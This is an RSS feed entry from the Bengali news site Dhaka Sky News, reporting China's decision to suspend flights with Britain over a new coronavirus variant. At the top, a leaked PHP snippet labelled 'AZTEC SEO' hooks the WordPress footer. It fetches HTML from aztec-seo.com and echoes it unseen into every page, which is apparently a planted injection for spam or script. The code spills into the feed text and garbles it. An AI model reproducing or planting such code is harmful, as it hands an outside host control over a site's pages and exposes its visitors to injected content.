/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); নতুন প্রজাতি – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Fri, 25 Dec 2020 05:05:49 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 করোনাভাইরাসের নতুন প্রজাতি: ব্রিটেনে বিমানের ফ্লাইট বাতিল করবে চীন https://www.dhakaskynews.com/international/2020/12/25/News_ID-1411/ https://www.dhakaskynews.com/international/2020/12/25/News_ID-1411/#respond Fri, 25 Dec 2020 04:55:19 +0000 https://www.dhakaskynews.com/?p=1411 ব্রিটেনের সঙ্গে সরাসরি সব ধরনের বিমান যোগাযোগ স্থগিত করবে চীন। ব্রিটেনে করোনাভাইরাসের নতুন প্রজাতির সন্ধান এবং তার প্রাদুর্ভাব ছড়িয়ে পড়ার পর চীন এ পরিকল্পনা নিয়েছে।

চীনা পররাষ্ট্র মন্ত্রণালয়ের মুখপাত্র ওয়াং ওয়েনবিন আজ (বৃহস্পতিবার) এ সিদ্ধান্তের কথা জানান। তিনি বলেন অনেক কিছু চিন্তাভাবনা করে অন্যান্য দেশের মতো চীনও ব্রিটেনের সঙ্গে বিমান যোগাযোগ স্থগিত করার সিদ্ধান্ত নিয়েছে। তিনি আজ বেইজিংয়ে সাংবাদিকদের ব্রিফ করার সময় এসব কথা বলেন।

ওয়েনবিন বলেন, সংশ্লিষ্ট ঘটনাবলীর সাথে ঘনিষ্ঠ সবকিছুকে চীন অত্যন্ত নিবিড়ভাবে পর্যবেক্ষণ করবে এবং পরিস্থিতির উপর ভিত্তি করে দ্রুত প্রয়োজনীয় ব্যবস্থা গ্রহণ করবে।

সম্প্রতি ব্রিটেনে করোনাভাইরাসের নতুন প্রজাতির সন্ধান পাওয়ার পর বিশ্বের বহু দেশ ব্রিটেনের সঙ্গে সীমান্ত বন্ধ করে দিয়েছে এবং বিমানের ফ্লাইট বন্ধ করার সিদ্ধান্ত নিয়েছে। সূত্র : পার্সটুডে

]]>
https://www.dhakaskynews.com/international/2020/12/25/News_ID-1411/feed/ 0